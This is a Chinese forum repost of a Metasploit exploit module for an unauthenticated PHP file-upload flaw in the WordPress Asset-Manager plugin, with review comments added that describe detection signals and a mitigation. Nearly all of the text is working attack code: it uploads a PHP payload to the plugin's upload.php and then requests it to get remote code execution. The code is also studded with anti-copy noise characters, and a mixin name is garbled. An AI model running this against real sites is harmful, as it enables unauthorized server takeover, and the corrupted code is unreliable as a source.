
WordPress Asset-Manager PHP文件上传漏洞

发表于 2012-12-31 09:22:33
这个 Metasploit 模块利用在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 PHP 文件:用户无需身份验证即可将文件上传到一个临时目录,从而导致任意代码执行。
4 p* B0 n$ |. ?/ r) D  w# t: [
+ ^' B; ]. Q& j##% `2 i" X, e4 v$ H
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
  q% w3 G- t& L##' Y# a2 z$ G% E, V+ W$ v2 Q  B- e! B
, l+ u& v% W- K, o$ [4 l
# Framework core plus the PHP-executable payload mixin used below
# (get_write_exec_payload). The second require line is interleaved with
# the forum's anti-copy noise; the intended statement is visible inside it.
require 'msf/core'
% a* X6 J# C$ u" Crequire 'msf/core/exploit/php_exe'; v" d3 R# l' o& X+ b; L" @' p$ D5 {
% ~5 M/ @  a7 p0 ^) u
# NOTE(review): every code line below is reproduced byte-for-byte from the
# forum paste, which interleaves anti-copy noise characters with the source.
# Only the comment lines are new. Compare against the upstream Metasploit
# module before relying on any individual line.
#
# Exploit module for the unauthenticated file upload in the WordPress
# Asset-Manager plugin (<= 2.0 per the Description below).
#
# Observable behaviour, as written in #exploit:
#   1. POST to <TARGETURI>/wp-content/plugins/asset-manager/upload.php with a
#      multipart/form-data body whose single part is named "Filedata" and
#      carries a random 5-letter .php filename.
#   2. GET <TARGETURI>/wp-content/uploads/assets/temp/<that filename>.
# For defenders those two requests are the detection signal; an unauthenticated
# POST to the plugin's upload.php followed by a GET of a .php file under
# wp-content/uploads/assets/temp/ is the pattern to alert on. Preventing PHP
# execution under wp-content/uploads removes step 2 regardless of plugin version.
class Metasploit3 < Msf::Exploit::Remote& x2 s! j/ J! N/ [
  Rank = ExcellentRanking
0 x% S4 ?* H: H7 ^% p3 v* p " N# V0 Z$ D; w* a' @' i- V
  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): the mixin name on the next line is garbled by the forum's
  # text filter; presumably Msf::Exploit::PhpEXE (required above via
  # 'msf/core/exploit/php_exe'), which supplies get_write_exec_payload. Confirm.
; H2 I/ J' f( e/ }* |8 w  include Msf::Exploit:hpEXE
' r* @+ x  ?: c4 [: d3 V
  # Module metadata: name, description, authors, references, payload
  # constraints, targets and the TARGETURI option.
  #
  # @param info [Hash] metadata passed through update_info to the superclass
, H) F4 f) s) g5 G- K4 ~2 Y- ]  def initialize(info = {})0 z) F( E, e  L& B" B
    super(update_info(info,
, i5 J% A! q) u# c% X      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',9 T1 y3 v  V; }1 _
      'Description'    => %q{
! p! ], ~: b: O# ^        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress) D, A! w, C/ }6 E
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a: S, ]+ }& I. g* c/ R3 m
        temp directory without authentication, which results in arbitrary code execution.9 Y; O4 q7 K( Y) I* M: i0 `
      },
9 O' q9 o& C/ t0 w' F      'Author'         =>, d& U; v. z0 B) K' U% m% j
        [
9 l# V$ {1 @1 B( Y* W2 \% q# p          'Sammy FORGIT', # initial discovery2 G! y$ J* c4 d; V# H' ~* g8 k
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ i1 X; Y2 v! i# l4 `5 S3 d; ~
        ],
: n7 {5 b/ W0 `; U      'License'        => MSF_LICENSE,
4 K5 H0 ~' U$ k5 P9 M      'References'     =>6 I4 a1 V- L$ Y$ O% X* [
        [
3 U/ z! X5 r$ C) Z$ ?          [ 'OSVDB', '82653' ],3 X' V( G% Q  c& o
          [ 'BID', '53809' ],
' `7 \7 |. z2 u" u          [ 'EDB', '18993' ],
          # NOTE(review): this URL reference looks like it was replaced by the
          # reposting site; verify against the upstream module's reference list.
7 G" Z# g; d- ^! J* G# ^( H          [ 'URL', 'http:// www.myhack58.com /' ]2 B- L: R2 n* z6 v/ }2 }3 s
        ],
  J- }* d/ c9 q9 o      'Payload'       =>
2 }: I# ?0 C. L" J+ V7 z! \        {
          # NUL is the only byte excluded from generated payloads.
3 H3 c' p8 A  O$ B* E! m          'BadChars' => "\x00",* }3 W2 N1 i+ K
        },( A0 x- z1 J6 o% ^5 R0 d
      'Platform'       => 'php',7 U8 r! S: j& z+ Y  [
      'Arch'           => ARCH_PHP,
  d0 p7 _8 D4 M- N& H/ {/ q      'Targets'        =>. s9 j# U# O& @. T  u" a
        [
* H. s: `4 ~/ Y. c1 E1 T          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
4 C  m0 I: L0 V1 Q) S          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 Y4 {6 k' Q& F8 A, b3 E        ],7 {1 Y2 F$ z* V$ ]
      # Index into 'Targets' above: the generic PHP payload target.
      'DefaultTarget' => 0,
6 h+ e1 ?- L2 P/ y      'DisclosureDate' => 'May 26 2012'))
9 o8 i: s( Y- |$ @. X3 ^ " v0 z! @) d  l& ~& \& t' L( f
    # TARGETURI is the WordPress base path; both requests in #exploit are built
    # relative to it. Defaults to '/wordpress'.
    register_options(# f$ c0 j8 {8 [5 a
      [! {: B- n/ Q3 d" H1 t
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])6 G" z/ B' q! H
      ], self.class)
2 \" c( e* l3 j( d, C  end" C% S/ d7 c: U7 y) D
/ Z- q" {# V( g: @' V
  # Uploads the generated PHP payload via the plugin's upload.php and then
  # requests it from the plugin's temp upload directory.
  #
  # Calls fail_with(Exploit::Failure::UnexpectedReply, ...) when the upload
  # response is missing, non-200, or does not echo the uploaded filename, and
  # when the follow-up GET returns a non-200 response.
  def exploit
    # Normalise TARGETURI to a trailing '/' so the plugin paths below can be
    # appended directly.
; o; c* `7 U( Y    uri =  target_uri.path  d5 o6 }7 F- v. p4 ?1 o9 l
    uri << '/' if uri[-1,1] != '/'7 e# Z/ Q& O. i6 z4 X: `
    peer = "#{rhost}:#{rport}"
    # Random 5-letter basename with a .php extension; the same name is used in
    # the multipart filename, the success check and the follow-up GET.
, \7 c% Y  x/ w) d* f- W+ k% }    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self => true is passed to the PhpEXE mixin; by its name the
    # generated script removes itself after running — behaviour lives in the
    # mixin, not shown here, so confirm there.
2 I1 ~. B+ X  G    php_payload = get_write_exec_payload(:unlink_self=>true)
( _5 k1 K' R& i8 s) Y  ` $ K" U9 t! @1 N
    # Single-part multipart/form-data body; the form field is named "Filedata".
    data = Rex::MIME::Message.new1 j# U& U* i7 q6 o, S
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the CRLF that Rex::MIME emits before the first '--_Part_' boundary.
* V2 \4 n% g7 E3 P3 j) G    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
% B/ H+ I& x- S- f
: U- d* P0 B- m' `    print_status("#{peer} - Uploading payload #{payload_name}")( x( U1 q7 l" m: I2 l* y
    res = send_request_cgi({& H, |* X8 a, H0 d* W0 j5 f
      'method'  => 'POST',9 B8 g/ m6 x7 d$ r& J3 m( b5 d
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",. Z0 P' Q2 U* B7 ^6 K
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",! c( _  E% z& }% j
      'data'    => post_data. O; [5 A/ Y4 m8 o6 z+ \: ~- O
    })4 p- G) V* W, K
  c2 M3 C4 _& R5 L
    # Upload is considered successful only when the server answers 200 and the
    # response body contains the uploaded filename.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
: [3 J( e8 G$ i7 v7 j! M      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ `2 O' P9 ~4 }end  y( R4 f0 H7 n- l4 b. R

    # Request the uploaded file from the plugin's temp directory so the web
    # server executes it.
( n# \' ]4 t' p. J; _0 z* Q    print_status("#{peer} - Executing payload #{payload_name}")4 S8 Z% j# ?2 K# D; u
    res = send_request_raw({
! W* D9 u3 ~. E1 s5 G      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",# `# [9 R. G; Q  r
      'method'  => 'GET'
$ s% ?+ L; i8 {+ T* t7 s# C    })
" g0 Y0 R3 j; j. b! I
    # Only a non-200 response counts as failure here; a nil response (no reply
    # at all) is deliberately not treated as an error.
" }+ n# C6 s! K0 g* x* v    if res and res.code != 200
$ L/ X6 x' g( u! A5 [( K5 m9 p      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
4 s4 z5 o, @2 Y+ {    end
7 i9 @3 _% d7 Y8 e, B  l  end
* d0 m# h8 ]2 l! Xend5 F5 k, c. L* ]& N) D4 y$ X